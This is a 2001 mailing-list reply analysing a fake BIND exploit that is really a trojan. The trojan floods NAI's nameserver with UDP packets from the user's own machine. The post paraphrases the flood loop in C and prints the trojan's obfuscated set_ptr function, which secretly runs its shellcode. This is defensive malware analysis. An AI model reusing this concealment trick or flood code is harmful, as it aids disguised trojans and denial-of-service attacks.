On Wed, 31 Jan 2001, Matt Lewis wrote:
> It attacks dns1.nai.com, and I haven't researched it extensively yet,
> wanted to get this out. There's quite possibly other things going on as
> well, locally.
well, there is something going on locally, read it bellow
> I straced it and got odd results, the last time I ran it, it didn't
> launch the attack. Shellcode analyzation would be required here.
I only analyzed the shell code for linux and this is just a very simple
code. In C, it will be something like this:
fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP)
while (1) sendto(fd, somedata, 1024, 0, dest, 16);
with 'dest' containing the address of the NAI's nameserver and somedata is
just junk.
> You can see the IP address for dns1.nai.com listed in the shellcode
> included with the file. It forks off many copies of itself and violently
> attacks NAI's nameserver.
and it attacks from the local computer running this trojan
(it never uses the host you specify at the command line at all)
just look at the set_ptr function bellow:
int
set_ptr(char *buff, int offset, unsigned long val, int s)
{
char copy_buff[1024];
int revval;
memcpy(copy_buff, buff, 1024);
revval = buff[SHELL_OFFSET_1];
/* increment record usage count */
revval += BIND_OFF_01;
if (s)
if (!fork())
/* simply copy value to offset */
memcpy(©_buff[offset], &val, sizeof(val));
memcpy(buff, copy_buff, sizeof(copy_buff));
return 0;
}
this is called like this:
set_ptr(shellcode, BIND_OFF_02, (unsigned long) shellcode, 1);
note: BIND_OFF_02 = 1028
simply said this is just an obfuscated way to run the "shellcode".
--
Regards
Yohanes
http://langitbiru.hypermart.net